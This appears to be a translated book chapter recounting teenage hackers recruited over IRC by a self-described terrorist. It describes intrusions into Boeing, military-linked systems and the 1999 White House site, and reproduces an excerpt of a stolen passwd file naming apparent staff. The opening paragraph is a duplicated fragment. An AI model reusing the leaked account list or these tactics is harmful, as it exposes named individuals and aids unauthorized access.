黑客入侵会发生什么情况(黑客入侵背后的真实故事)
黑客入侵会发生什么情况(黑客入侵背后的真实故事)Comrade也在IRC聊天室里消磨了不少时间,就是在IRC聊天室里与遥远的neOh结识,并成为好友。黑客们经常组成联盟交换信息,并进行群袭。neOh、neOh开始为自己成为一名合格的黑客打下扎实的知识基础,并有意培养自己在这方面的能力。技术水平上升很快,应有的谨慎却相对不足。他用黑客的语言来描述当自己还是这方面的新手时,说道:“在我只能进行低级攻击时,我是个十足的冒失鬼,我往别人网站涂鸦后,把自己的真实邮箱地址粘贴在网站里。”他以前常在IRC(Intemet Relay Chat)聊天室里转悠。IRC是一个基于文本的Internet聊天室,在那里有共同兴趣的人可以在网上会面,并实时互换信息,例如用蝇钓鱼、飞机收藏、家酿啤酒等其他成千上万个话题,当然也包括非法入侵。只要你在IRC聊天室里写下一条信息,所有在线的人都可以看到,并能收到回复。虽然许多人经常上IRC 但他们并不知道他们交流的所有
当恐怖分子来袭时
网名叫comrade的一位20岁年轻黑客此时正在迈阿密一个风景优美的社区内的一套房子里转悠。这套房子是他和弟弟共同所有的。他们的父亲也与他们住在一起,但这仅是因为他弟弟年幼,社区儿童服务处坚称在孩子未满18岁之前,家里得有大人负责监护。两兄弟对这一切毫不在乎,并且他们的父亲在别处也有自己的公寓,只要时机一到,他就会搬回去。
Comrade的母亲两年前去世了,去世后将这套房子留给了儿子,因为她和孩子们的父亲离婚了。她同样留下了一些钱。弟弟上高中了,Comrade整日“都闲赋在家”。对家里很多的问题,他表示“并不在意”。如果你在很小的时候就被送进监狱——事实上是曾被联邦政府指控为最年轻的黑客——这种经历也许会改变你对他的看法。
黑客无国界,自然对Comrade和他远在3000英里外的黑客朋友neOh也是一样。非法入侵让他们相识,并让他们因此经历了不少事情,最后,这一切都成为他们为国际恐怖组织攻击高度保密的计算机系统的诱因。那时,沾上这些事情可不是什么好事。
neOh比Comrade大一岁,并且“当能够着键盘的时候,就开始玩电脑了”。他父亲经营着一家计算机硬件商店,这位父亲与客户见面谈生意时也会带上自己的孩子;当时年幼的neOh就坐在父亲腿上。11岁时,他已经为方便父亲做生意编写dBase代码程序了。
一次在网上,他偶然发现了一本书籍Takedown (Hyperion出版社,1996)-那是一本关于我自己入侵冒险经历的书,描述了我三年的黑客生涯,和联邦调查局对我开展的调查,其中的叙述与事实相去甚远。neOh被这本书迷住了:
你的故事极大地激励了我。你真是我的偶像。我把故事里的每个细节都仔细地阅读过,我想成为一个像你一样的人物。
这就是他最初涉足黑客的动机。他用计算机、网络集线器和一个6英尺长的旗标装饰自己的房间,打算从此步我的后尘。
neOh开始为自己成为一名合格的黑客打下扎实的知识基础,并有意培养自己在这方面的能力。技术水平上升很快,应有的谨慎却相对不足。他用黑客的语言来描述当自己还是这方面的新手时,说道:“在我只能进行低级攻击时,我是个十足的冒失鬼,我往别人网站涂鸦后,把自己的真实邮箱地址粘贴在网站里。”
他以前常在IRC(Intemet Relay Chat)聊天室里转悠。IRC是一个基于文本的Internet聊天室,在那里有共同兴趣的人可以在网上会面,并实时互换信息,例如用蝇钓鱼、飞机收藏、家酿啤酒等其他成千上万个话题,当然也包括非法入侵。
只要你在IRC聊天室里写下一条信息,所有在线的人都可以看到,并能收到回复。虽然许多人经常上IRC 但他们并不知道他们交流的所有内容都会被记录下来。我想,到目前为止这些记录所包含的字数与国家图书馆里所有图书所包含的字数差不多——而这些在匆忙间不假思索写下的不顾后果的言语甚至在几年之后都能查到。
Comrade也在IRC聊天室里消磨了不少时间,就是在IRC聊天室里与遥远的neOh结识,并成为好友。黑客们经常组成联盟交换信息,并进行群袭。neOh、
Comrade以及另一个孩子决定组建自己的联盟,并取名为“无敌小精灵”。另外几个黑客也被允许加入到这个组织的谈话中来,但最初三个成员并没有将他们进行“黑帽黑客”入侵的事情告诉其他人。“我们攻击政府的网站仅是觉得好玩而已”,Comrade说道。据他估计,他们曾攻击过几百个据称是安全的政府网站。
IRC的一些频道是灌水区,不同类型的黑客可以在那里聚首。其中特别值得一提的是Efhet 据Comrade描述,这个站点“并不是真正的地下站点——而是一个庞大的服务器群”。但在Efhet内却有一些鲜为人知的频道,在这些频道内你无法自己访问,而必须首先赢得一些黑客的信任,由他们介绍才能入内。Comrade说这些频道才是“真正埋在地下的”。
2.1恐怖主义者投下诱饵
1998年前后,Comrade在这些地下频道里看到了一个家伙的聊天记录,这家伙一直在那里闲逛,使用的是RahulB的马甲(后来他也使用Rama3456)o “听说他在寻找黑客帮助他袭击政府和军队的计算机系统——政府和军队的网站”,Comrade说道。“有传闻说他在为本•拉登工作。那时还没有9 *11事件,所以本•拉登这个名字人们并不熟悉,不像今天,你每天都可以在新闻里听到。”终于有一天,Comrade与这个神秘的人物狭路相逢了,他名叫Khalid Ibrahim。“我在IRC聊天室里与他谈了几分钟,而且我还与他通过一次电话。”这个人操着一口外国口音,而且“电话的声音听起来像是越洋电话”。
neOh同样也被盯上了 ; Khalid对他更加直截了当,更明目张胆。NeOh回忆道:1999年前后,我收到一封自称是激进分子写来的邮件,他说他在巴基斯坦。他自称名叫Khalid Ibrahim。他告诉我,他为巴基斯坦激进组织工作。
难道真会有人在寻找少年黑客时,给自己贴上恐怖分子的标签? ——即使在9-11之前?咋一看这种行为让人觉得荒诞。接下来这个男人自称曾在美国上过学,自己也做过一点非法入侵,当还在学校的时候他与那里的黑客们也有联系。所以也许他了解,至少他自认为了解黑客们的想法。每个黑客都有些离经叛道,生活标准与常人不同,并以攻击系统为乐。如果你打算对黑客投下诱饵,也许将自己描述成一个离经叛道者会让自己显得不那么愚蠢。也许这样会让你的故事更可信,你目标中的同盟者也会对你放松警惕。
另一个牵涉的问题就是钱。Khalid为neOh入侵某国一所大学的计算机网络提供1000美元的报酬,要求提供该校的学生数据库文件。这可能是一次测验,测试neOh的能力和智商:在语言不通的情况下,你怎样才能入侵目标系统?更困难的是:在你不会相应语言的情况下,你如何与人们进行沟通?
对neOh来说,语言根本不存在什么问题。他曾在IRC站点里一个名为gLobaLheLL的群里浏览过,并在那里与该校的一名学生有过联系。经过接触,他问了该生好几个这个学校的用户名和口令。不一会儿他要的信息就如期而至一黑客对黑客,直截了当,决不多问。neOh发现这个学校的计算机安全系统简直糟透了,特别让人不可思议的是这还是一所工程技术学校,按道理他们应该做得好些。大多数学生的用户名与口令完全一致——用户名就是口令。
那名学生给的短清单已足够让neOh登录系统并窥探一番了——用黑客的话来说,就是“探” {sniffing)。这名偶然出现的学生——我们称他为“Chang” ——他当时正在访问美国的FTP(—个下载站点)。在FTP站点中有一个“warez”节点--个专门检索软件的地方。neOh使用的是一个惯用的小伎俩,他先在Chang
所在学校的校园网里转了几圈,学会了几句口头禅。这件事比最初看上去的要简单,因为“他们大部分都说英语”,neOh介绍道。然后他就找到了 Chang 并用那些刚学会的口头禅跟Chang打招呼,这样他看上去就像是在那所学校计算机科学实验室里与Chang联系。
“我是213楼的”,他告诉Chang 并且开门见山地要其他学生的姓名和邮箱地址,就像任何一名希望与同班同学取得联系的学生一样。因为大多数口令如此简单,以至于neOh不费吹灰之力就入侵了学生的文件。
在很短的时间里,他就向Khalid递交了该校约100名学生的数据信息。“我给他这些时,他说道:‘我已经拿到了我所需要的。’” Khalid很满意,显然他并不想要所有名单;仅想看一下neOh能否从一个如此遥远的地方获取所需的信息。“那正是我们来往的开始,” neOh感叹道,“我能做这项工作,他知道我能做,于是他又给我安排了其他任务。”
他让我查询自己的信箱,并确认是否收到了他所答应的1000美元报酬。Khalid开始每周用手机给我打电话,“通常都是在他开车的时候”。第二个任务是攻击印度Bhabha原子能研究中心的计算机系统。他们运行的是Sun工作站一一个为黑客熟知的平台。neOh非常容易地访问成功了,却没找到任何有价值的信息,并发现这些机器都是独立的,没有与任何网络连接。但Khalid似乎并没有因此而生气。
同时,入侵大学系统的报酬却迟迟没有拿到。当neOh问起的时候,Khalid显得有些不安。“你没有拿到吗?我把现金夹在一张生日卡片里寄给你了呀!”他坚持这样说。显然这是一个老套的耍赖伎俩,然而neOh却愿意继续接受新的任务。为什么会这样呢?到今天他才有所醒悟:
我坚持那么做是因为我愚笨。那时只要一想到将能从那件事情上面得到一笔钱就很兴奋。而且那时我在想,“也许钱真的在路上丢了;或许他这次会付我钱的。”
我不知道自己为什么要坚持做。上瘾了?缺钱花?还是对权力的渴望?我可以找出许多理由。
同时Khalid也不断地给neOh布置新的任务。在IRC站点里他也同样引诱其他的自愿玩家。Comrade便是其中之一,虽然Comrade在收钱方面表现得比较谨慎:
我知道他付给别人钱,但我从来没打算用我的信息来賺钱。我想做的只是四处看看,但一旦我收了钱,那我就真的犯罪了。我至多在IRC里面与他聊一会儿,并不时地给他提供一些主机名。
记者Nial McKay曾采访过Khalid钓到的另一条鱼一一个加利福尼亚少年(他现在是一家成功的软件安全公司的合伙人),他当时用的网名是Chameleon。McKay在Wired.com上报道的故事与neOh和Comrade提供的细节完全吻合。“一天晚上我在IRC里,一个家伙跟我说想要DEM软件。当时我手头上没有,所以只是随便应付他”,这名黑客说道。但这次Khalid变得严肃起来:DEM是国防情报资料网络设备管理系统(Defense Information System Network Equipment Manager)的简称,它是军事上使用的网络软件。这个程序已被一个名为Masters of Downloading的黑客群所攻破了,并且关于这个程序的一些东西己经传播开来,只要你问对人,就可以得到想要的信息。没有人知道Khalid是否已经得手,至少没有听人说起这回事。事实上,软件对他来说有没有价值还是个问题一但显然他认为有价值。Khalid 一直都在玩着攻击大学系统之类的游戏。
“他努力让自己在黑客群中显得协调”,neOh告诉我们。在一切结束之前,Khalid会将自己在黑客面前隐藏个一年半载的,“不像其他网民,虽然也是不定时出现,但出现的频率还是大致不变的。他其实就在那里,而且大家都明白他的工作。” neOh告诉我们Khalid的工作就是入侵军事网站,或那些为军队完成项目的公司的计算机系统。
Khalid 要求 neOh 入侵 Lockheed Martin 并拿到 Lockheed Martin 为波音公司制作的飞机图表。neOh登录上去了,但只能在有限范围内活动,他说,“只需要三跳步数就可以进入内部网络了”,但无论如何难以再进一步了,他只能到达“非军事区”(网络安全人员称之为“DMZ”的区域)。事实上,这离跨越防火墙盗取最机密的信息己经不远了,但neOh就是找不到他要的信息。从neOh那里我们
知道:他(Khalid)非常恼火。他说得毫不留情:“你不要再为我做事了!你什么也干
不了!”但转而他又怀疑我为自己将信息截取下来,不愿告诉他。
然后他又跟我说,“忘掉Lockheed Martin吧,直接上波音公司找。”
neOh发现“波音公司安全防护没有那么严密,至少比想象的要简单很多”。调查一番后,他利用Internet上已经发布了的波音公司系统的脆弱点。然后他安装了一个sniffer(报文嗅探)软件,这样他就可以窃听到所有进出计算机的数据报文。从这些报文中,他得到了一些口令,并看到了一些加密邮件。从邮件当中获取的信息足以让他进入内部网络了。
我找到了 一些画有波音747的仓门和飞机前端的图表一是从明文邮件中得到的(未加密的附件)。是不是太爽了?他得意地笑了。
Khalid也狂喜,并表示他会付给我4000美元。然而这4000美元从来也没有兑现——奇怪,太奇怪了。
说实话,为这些信息回报4000美元实在是有点昂贵了。据波音公司前安全执行官Don Boelling称,黑客完全可以像前面描述的那样入侵,但那样做也是浪费时间:因为一旦某种机型投入使用,就会给所有顾客赠送该飞机图表。因为那时这方面的信息己不是什么公司机密了;任何想要的人都可以拿到。“甚至最近我在eBay上面看到了 747的图表光盘”,Don说道。当然Khalid不可能知道这些。同样直到两年后美国人才明白为什么当年恐怖分子执意要弄到航空公司的主流机型的图表。
2.2 今晚的猎物:SIPRNET
Khalid毫不费力地为Comrade设计测验。Comrade说,从一开始Khalid就表示“他情有独钟,只对军事和SIPRNET(保密Internet协议路由器网络)感兴趣”。
很多时候,他并不是很确定他需要什么信息——仅仅是进入到政府和军队的网站。但唯独SIPRNET除外。他真的很想从SIPRNET那里获得信息。
显然Khalid非常渴求那些信息;也许那才是他长期以来追求的真正目标。SIPRNET 是 DISN 即国防情报资料系统网络(the Defense Information SystemNetwork)的一部分(DIS可以传送分类信息)。现在SIPRNET也是美国军队的命令和控制中心。
neOh拒绝了 Khalid委派的入侵SIPRNET的任务:他给我开价2000美元,我拒绝了他。如果我胆敢把手伸向SIPRNET 马上就会有联邦调查局人员来敲我的门。我的脑袋可不止2000美元。
当Khalid将这个任务交给Comrade的时候,价钱上涨了。“他说一定会付钱,我猜他会给我10 000美元,” Comrade回忆道。从他的口气当中我们得知,对于这个项目他似乎没有neOh那么冒失,他一再坚称是那个挑战诱惑了他,而不是那笔钱。
事实上我已经十分接近SIPRNET 了,我在DISA(国防情报资料安全局,Defense Information Security Agency)登录了那个单机系统。那台计算机配置太陈旧
了。我想它有4个处理器,2000名用户拥有访问权。UNIX主机文件中大约涉及5000个不同的主机,其中一半使用的是特权账号,而你必须在那些计算机上才能
访问一从外部是访问不了的。
Comrade预感到自己已在无意中卷入一次重大事件中。DISA的核心任务包括
联合命令与控制,以及为军事打击提供计算(combat support computing) 显然与SIPRNET的作用相同。然而在他意识到时为时己晚。
能够进行访问着实令人兴奋,但在我还没来得及在上面转悠的时候,大约三四天后,我就被捕了。
2.3令人担心的时刻来了
1999年的圣诞节,neOh和Comrade获悉一条十分震惊的消息。印度航空公司的IC-814航班在从加德满都去往新德里的路上被劫持了,机上共有178名乘客和11名机组人员。据新闻报道称,这些劫持者是巴基斯坦恐怖分子,与塔利班集团有牵连。像Khalid —样的恐怖分子?
在恐怖分子的恐吓下,空中列车A300蜿蜒地向中东飞去而后折回,如此反复,其中在印度、巴基斯坦和阿联酋有过短暂降落,以抛投被害乘客的尸体。乘客当中有一名年轻男子刚与妻子度完蜜月准备回家,在机上就因为拒绝带上蒙眼布而惹恼了恐怖分子,遭当场刺死。
飞机最后降落在阿富汗的坎大拉——这似乎更证实了劫机者与塔利班集团的
渊源。剩下的乘客与机组人员在机上作为人质被困了8个不堪回首的日子,最后恐怖分子以释放被监禁的激进分子作为交换条件,放了他们。被释放的激进分子当中有一个叫Sheikh Umer 日后在资金方面为Mohammed Atta提供了援助。而Mohammed Atta也就是9 • 11预谋袭击美国世贸大楼的头目之一。
劫机事件后,Khalid告诉neOh这个事情就是他们组织策划的,而且他本人也插手了。
他的话吓死我了。他是个坏人。我想我得断绝与他的联系。但neOh的自责又因少年的贪婪而忘记了。“我仍幻想他会付给我钱”,他补充道。
与劫机事件的联系使Khalid的气焰更加嚣张。而另一方面因为少年黑客们迟迟未能给他提供需要的信息使他非常恼怒,Khalid开始实施高压政策。记者NialMcKay在Wired.com上的报道中写到了他在IRC的记录里看到Khalid写给孩子们的信息,其中Khalid恐吓孩子们,如果他们向联邦调查局告发他的话,就会将他们全部杀掉。MaKay还看到一条从巴基斯坦发给孩子们的消息:“我想知道:你们是否有人出卖我了? ”还有一次是:“你们互相转告,如果有谁胆敢出卖我,我就会像剁砧板上的肉一样将他剁成酱!”
2.4 Comrade 被捕
局势日趋严峻,仍在不断地恶化。就在Comrade成功访问与SIPRNET有联系的系统后不久,他父亲在一天去上班的途中被警察拦住了,“我们想跟您儿子谈谈”,并向他出示了搜查证。Comrade还记得当时的一幕:
来了一群人,他们是国家航空航天局、国防部和联邦调查局派来的。当中有10到12个探员,还有一些警察。我在NASA的一些机器上浪费了太多时间!我在ns3.gtra.mil上装了 一个报文探测软件,仅是为了得到一些口令,但无意中发现了几封邮件。他们指控我非法窃听机密邮件,在NASA计算机系统上侵犯了版权,还从事其他一些违法行为。
就在这前一天,一个朋友跟我说:“嗨,伙计,我们不久就要锒档入狱了。”当时我还骂他胡说八道。“但这回他说对了”,接着我清除了硬盘。
但Comrade的销毁工作做得不是很彻底。“我忘了旧的驱动器还在桌子里。”
他们问了我一些问题。我供认不讳,我说:“对不起,那些是我干的,我会补救的,并且从此金盆洗手,不会再干。”他们并不凶,“好吧,我们也不认为你犯了罪,但不能再干了,否则下次就得给你戴手铐了。”他们将我的计算机、软盘、其他外围设备,以及没有处理干净的硬盘驱动器搬走,接着离开了。
没过多久他们想让Comrade说出加密硬盘驱动器的口令。Comrade不愿说,他们表示无法攻破口令。但Comrade更清楚:他使用的是PGP加密,并且他的口令“差不多有100个字节。”他坚持说自己将口令忘记了——事实上是由他非常喜欢的三句话连在一起构成的。
大约6个月的时间里,Comrade没从他们那里听到任何消息。突然有一天他得知政府将起诉他。法庭上,当他听到起诉人指控他造成NASA的计算机被迫停机三个星期,以及拦截了国防部的上千封邮件时,Comrade惊呆了。
(事实上,我对这一切再清楚不过了,起诉人所说的严重后果与实际损失有时候会有出入。Comrade从位于阿拉巴马的国家航天局Marshall空间飞行中心下载了一个软件,用它来控制互联网空间工作站的温度与湿度;政府指控这个行为造成部分计算机系统被迫停机三个星期。国防部的指控提供了更为让人关注的现实材料:Comrade攻击了美国国防部国防威胁降低局的计算机系统,并特意在那里
给自己安装了 一个后门以便随时登录)。
显然政府有意将这件案子列为重点以警示其他少年黑客,并将他的罪行宣判大肆刊登在报纸上,说他是被联邦政府指控非法入侵的最年轻的罪犯。首席检察官Janet Reno甚至说:“这件案子标志着青少年黑客从此将要为自己的罪行服刑,也表明了我们对计算机入侵问题的严肃态度,以及法律部门解决这个问题的坚强决心。”
法官判处Comrade 6个月监禁,以及6个月观察期,在Comrade完成当前学期学习后立即执行。Comrade的母亲那时还没有去世,她重新请了个律师,写了很多信,向法官陈述了诸多理由。Comrade称这场官司俨然“改头换面,成了新案子”,并且难以令人相信的是监禁变成了居住软禁,观察期改成了 4年。
然而有时在生活当中我们就是把握不住来之不易的机会。“我确实被软禁了,之后就是被察看。但这中间发生了很多事情。我日常生活太过放肆,他们又将我送到了感化院。”第二次从感化院回来后,Comrade在一家网络公司找了一份工作
同时还创办了自己的网络工作室。但终究Comrade还是与负责对自己进行察看的官员互相看不顺眼,最后他还是被送进了监狱。那时他才16岁,为自己15岁所做的事情服刑。
联邦政府的少年犯并不多;他被送到一个“拘留所”。阿拉巴马的这个少年犯管教所只有10名罪犯,Comrade描述“那看上去十分像一个学校——锁着的大门和锯齿形的铁丝栅栏——不像监狱”。他甚至在那里都不用去上课,因为他已完成了高中学业。
再次回到迈阿密进行察看时,监控官员给了 Comrade 一串黑客名单,禁止他与这些人谈话。“名单上有neOh等。联邦政府仅知道neOh的网名。“但他们不知道他是谁。如果说我非法访问了 200次左右的话,那么他至少访问了上千次,”Comrade说道,“neOh相当聪明”。他们都知道执法部门尚无法将neOh的真实姓名查出,也无法找到他的真实地址。
2.5 调查 Khalid
Khalid是否真如他自己所说的那样是一个激进分子,还是仅是个骗子,故意引诱青少年呢?亦或这一切是联邦调查局设下的圈套,来测试这帮年轻的黑客究竟打算在这条路上走多远?曾经有段时间,每个与Khalid打过交道的黑客都怀疑他不是真正的激进分子;对这群少年黑客来说,与向外国间谍提供信息相比,受到别人愚弄更难接受。Comrade说他“在Khalid是谁这个问题上考虑得最多。我不知道他究竟是联邦调查局人员还是真正的恐怖分子。我与neOh谈过这个问题,最后我认为他不是违法分子。但我没收过他一分钱——那是我的最后一道防线,不能跨越。”(在早些时候与他谈话的过程中,当他第一次提及Khalid要给他10 000美元作为报酬时,他似乎对钱的数目印象非常深刻。如果他真的入侵成功,而Khalid真的付给他钱了,他真能拒绝吗?也许在这个问题上,Comrade自己也没有答案)。
neOh说Khalid “听上去十分专业”,但同时也承认自己一直都怀疑Khalid是否真的是激进分子。“在我跟他说话的时间里,我真觉得他是狗屎。但向与他接触过的朋友打听后,我们认为他的身份确实如他所说。
另一名黑客名叫SavecOre 有一次在IRC里遇见一名自称有个叔叔在联邦调查局的人,他说自己的叔叔可以让一个叫MilwOrm的黑客组织有豁免权。“我心想,这样我们就能给联邦调查局捎去口信,说我们不是恶意的ow SavecOre当年接受了记者McKay的邮件采访。“所以我就给他留了电话号码。第二天我就接到了一个自称是联邦调查局探员的电话,但令我感到奇怪的是,他居然操着浓重的巴基斯坦口音。”
“他告诉我他叫Michael Gordon 在华盛顿特区联邦调查局工作”,SavecOre告诉记者。“我那时意识到也许一直以来,他就是Ibrahim。”有些人在猜测也许所
谓的恐怖分子就是联邦调查局的探员。而SavecOre得出的结论刚好相反:那个自
称是探员的人是真正的恐怖分子,他这么做是想刺探一下孩子们是否会真的揭
发他。
那个认为这一切都是联邦调查局计划的言论是站不住脚的。如果仅是联邦政府想知道这些孩子究竟能干些什么,以及他们究竟会怎么做,那事先允诺的钱就会付给孩子们。如果联邦调查局认为事情相当严重,以至于要安排卧底的话,他们会用钱掩盖真相。然而他们事先允诺1000美元,然后又没兑现,这样就让事先
的安排显得没有意义。
事实上,他们当中有一个黑客从Khalid那里拿到了一笔钱,他就是Chameleono“一天早上我打开信箱,发现里面有张1000美元的支票,上面还有一个波士顿的电话号码”,Chameleon的事情登上了当年的另一家刊物《连线新闻》(1998年11月4期)。Khalid知道他有政府的计算机网络拓扑图,那张支票就是冲着这张图来的。Chameleon将这张支票兑换了。两个星期后,他突然被联邦调查局人员抓去审
问关于这张支票的问题,这儿读者也许会问政府怎么会注意到一张千元支票的问题,然而那时是9-11之前,联邦调查局的全部注意力都放在国内犯罪上,而对恐怖威胁却没有予以足够的重视。Chemeleon承认自己拿了钱,但对《联系新闻》的记者坚称自己从未向Khalid提供图的任何信息。
虽然他承认收了国外恐怖分子的钱——这个行为可能导致被当作间谍起诉,并被判长期劳役——但是事情过后没有下文。这就更加增添了事件的神秘色彩。也许政府只是想以此警告黑客:与外国商人做生意是危险的。也许这笔钱根本就不是Khalid给的,而是联邦调查局寄来的。
很少有人知道Chameleon的真实身份,而且他也对自己的身份讳莫如深。我们想得到他眼中故事的版本,他拒绝了(仅仅提起他认为Khalid是联邦调查局人员,而不是恐怖分子)。如果我是他,我也不会愿意被别人问及这个话题。
2.5.1 恐怖组织 Harkatul-Mujahideen
记者McKay在查找IRC的聊天记录时发现,Khalid曾给少年黑客们讲过他是Harkat-ul-Ansat的成员。据《南亚情报反馈》报道:“因与1997年被驱逐的沙特阿拉伯恐怖分子本拉登有联系,Harkat-ul-Ansar被美国政府宣布为恐怖组织。”
美国国务院对这个组织特别警惕,国务院曾有一条这样的情报:“巴基斯坦官员称美国10月13 0(2001年)在喀布尔的空袭中击毙了 22名与塔利班集团有联系的游击队员。这些被击毙的游击队员是Harkat-ul-Mujaheddin的成员,该组织在1995年被美国国务院列为恐怖组织。”
事实上,Harkat今天已被美国国务院列为36个国外恐怖组织之一。换句话说,美国政府已将他们列为地球上最邪恶的分子。
涉世不深的年轻黑客们自然不知道这些,对他们而言,这一切只是一场游戏。
至于Khalid 印度军方的一位少将在2002年4月的一次情报安全讲话中证实Khalid是一名恐怖分子,也道出这位巴基斯坦Harkat-ul-Ansar组织成员与黑客有联系。这位将军看上去有麻烦了,Khalid本人并不在巴基斯坦,而就在将军自己的国家里,在新德里。
2.5.2 9・11以后
有些黑客相当狡猾。他们欺骗计算机系统,把偷来的访问权视为自己真正的访问权;为达到目的,不断用社交手腕利用别人。所有这一切都告诉我们,当与黑客说话时,一定要仔细倾听他们所讲的内容及说话的口气,这些可以帮助我们判断他们讲的东西是否可信。但事实上有时的确让人难以判断。
我的合著者和我对neOh讲述的他对9 - 11的反应都不敢确信。在这里我只是写出来给大家看看:
你知道那天我哭得多么伤心吗?那一刻我感觉自己就要完蛋了。他讲述这些时,伴随着奇怪的笑声——意味着什么呢?我们不知道。
我觉得自己与这件事情有关。如果我成功访问洛克希德•马丁或波音公司获得更多信息的话,他们马上就会查出来。无论是对美国还是对我个人,这都是个危险的时刻。
我哭是后悔自己从未想过要举报他们。我没有很好地使用自己的判断力。这也正是他们找我干活的原因……
如果我染指世贸大楼袭击案的话……想到这个太令人害怕了。事实上在世贸大楼里我失去了三个朋友;我从未感到如此难受。
许多黑客都只有十几岁,或者更小。是因为年纪太小而意识不到陌生人的请求中存在的潜在威胁吗?这些陌生人可能危及自己国家的安全。就我个人来说,我宁愿认为9-11已经使黑客们——尤其是少年黑客——多长了个心眼,不会再上恐怖分子的当了。我希望我是对的。
2.5.3入侵白宫
计算机安全的历史与古代密码术的历史颇为相似。几个世纪来,密码制造者不断设计出自认为“永不可破解的密码”。即使在今天这样一个计算机时代,人们使用包含上百个字符的密钥给自己的信息加密,大多数的密码依然可以破解(美国密码设计和密码破解组织“国家安全局”称他们研制出一系列世界上规模最大、最快、最强大的计算机)。
计算机安全问题就像“猫和老鼠”的游戏:一方是安全专家,一方是入侵者。如Windows操作系统的代码行数有千万条。然而众所周知,复杂的软件无疑会存
在漏洞,聪明的黑客有一天肯定会找到。
同时,公司职员和政府官员(有时甚至是安全专家)会给自己的计算机安装新的应用程序,但往往会忽略更换默认口令或重新设计一个真正安全的口令。如果你常常看黑客攻击的新闻,你就会知道军队、政府甚至是白宫的网站都遭受过攻击。有的还被攻击过数次。
登录到一个网站并在网页上涂鸦只是一方面——虽然令人感到厌烦,很多时候这都不足以让人担忧。很多人在生活中只有一个口令;如果闯入网站的黑客盗得了 口令,入侵者将能在其他网络系统中长驱直入,造成更严重的后果。neOh告诉我们,1999年他与黑客组织gLobaLheLL的两名成员就干了一件这样的事,攻击对象是美国最敏感的地方:白宫。
我想那时白宫正在重新安装他们的操作系统,所有的设置都是默认的。Zyklon和MostFearD在大约10分钟到15分钟内,登录了网站,拿到了隐藏口令文件
并篡改了网站。他们做这些的时候,我就在旁边。
他们做这件事情的时间和地点都恰到好处。这纯属偶然:当网站正在修护的时候,他们刚好闯了进去。
我们曾在gLobaLheLL聊天室里讨论过这个问题。凌晨3点的时候我被一个电话吵醒了,他们告诉我他们正在干。我说:“别扯淡了,证明给我看看。”我跳到计算机前,发现他们所言不虚。
大部分是MostFearD和Zyklon做的。他们给了我一个shadow文件让我以最快的速度打开它。我也拿到了口令--个简单的字典上就有的单词。事情经过就是这样。
neOh提供了同伴给他的口令文件的一部分,其中列举了好几个看上去像白宫工作人员的授权用户名:
root:X:0:1:Super-User:/: /sbin/sh
daemon:x:1:1:: /:
bin:x:2:2:: /usr/bin:
sys:x:3:3:: /:
a dm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/sh
orion:x:1002:10:Christopher
Adams: /usr/users/orion:/usr/ace/sdshell
webadm:x:1130:101:Web
Administrator:/usr/users/webadm:/bin/sh
cadams:x:1003:10:Christopher
Adams: /usr/users/cadams:/usr/ace/sdshell
bartho m:x:1004:101:Mark
Bartholomew:/usr/users/bartho_m:/usr/ace/sdshell
monty:x:1139:101:Monty Haymes:/usr/users/monty:/bin/sh
debra:x:1148:101:Debra Reid:/usr/users/debra:/bin/sh
connie:x:1149:101:Connie
Colabatistto:usr/users/connie:/bin/sh
bill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh
这是以UNIX或Linux形式创建的口令文件,一般将加密的口令储存在一个单独的受保护文件中。每行列出系统中的一个用户名。其中有些行里面写有“sdshell”的词条,这表明这些用户还有其他的安全措施--个称为RSA的电子设备。这个设备每60秒生成一个6位数的验证码。在登录前进行身份确认时,这些用户必须将那一刻出现的安全验证码以及身份证号码(一些公司也让员工自己设置口令)输入。据neOh说,这些年轻黑客刚进入白宫网站就对网页进行了改写,以表示他们已经“到此一游”。neOh自己就与涂鸦事件有关联(参见图2-1)。在网站上除了粘贴gLobaLheLL黑客组的标志外,他们还写下了 “危险二人组”的标识语。neOh告诉我们说,写下假名是为了误导调查者。
据neOh回忆,这群入侵白宫的家伙并没有因自己入侵了国家安全级别最高的网站而沾沾自喜。他们真的“忙于入侵”,neOh解释说,“以向世界证明我们是最棒的。” neOh说,他们并没有怎么自我陶醉,而只是说:“干得不错,伙计们!我们终于成功了。下个目标在哪里? ”
但事实上他们己没有多少时间去进行任何形式的入侵了。他们的天就要塌下来了,而先前的传言又一次将故事线索集中到神秘的Khalid身上。
这时Zyklon或者叫Eric Bums的话题接过去了。他告诉我们,事实上他非globaLheLL的成员,但那时他刚好在IRC里与一些黑客聊过天。他是这么描述这件事的,他发现可以利用样本程序PHF的一个漏洞,他们的网站就会容易受到攻击,这样入侵白宫网站就变得可行了。PHF是用来访问基于Web的电话簿数据库的,它非常脆弱,这在黑客群体中己不是什么秘密,“使用它的人不多”,Zyklon说道。
图2-1白宫Web站点被丑化的页面,1999年5月
通过几个步骤(在本章结尾的“启示” 一节会详细讲到),他能获得whitehouse.gov的根用户权限,并能在这个局部网络中访问好几个系统,包括白宫email服务器。那时,Zyklon能截取任何往来于白宫职员和公众之间的信息。
但他同样可以,据Zyklon自己所说,能够“弄到口令的副本和shadow文件”。他们就一直逗留在那里,看看自己能发现点什么,就那样一直等到人们都来上班了。就在等候期间,他收到了一条来自Khalid的信息,Khlid说他正在撰写一篇有关入侵的文章,问Zyklon最近有没有什么入侵实例可以提供。“所以我就告诉,我们正在攻击白宫网站”,Zyklon说道。
在与Zyklon交谈的两小时内,他还告诉我,他们在网站上看到了一个嗅探器——系统管理员所使用的一种工具,用来查看网站上正发生的情况,并可用来追踪网站上的用户。难到是巧合吗?或者难道是因为某些特别的原因需要他们在那一刻检查网络?离Zyklon找出这个答案,还有好几个月。当发现嗅探器的那一刻,黑客们立即拔出网线接口,下了线,他们只是希望能比管理员抢先一步,在
管理员发现他们之前,自己己经先发现了管理员。
但他们己经捅了马蜂窝。大约两个星期后,FBI的探员展开大规模行动,逮捕了每个他们己经确认身份的gLobaLheLL成员。除了 Zyklon(当时19岁)在华盛顿州被捕外,他们还抓获了 MostHateD(真名Patrick Gregory 当时也是19岁,来自德克萨斯州)、MindPhasr(真名Chad Davis 来自威斯康星州)等人。
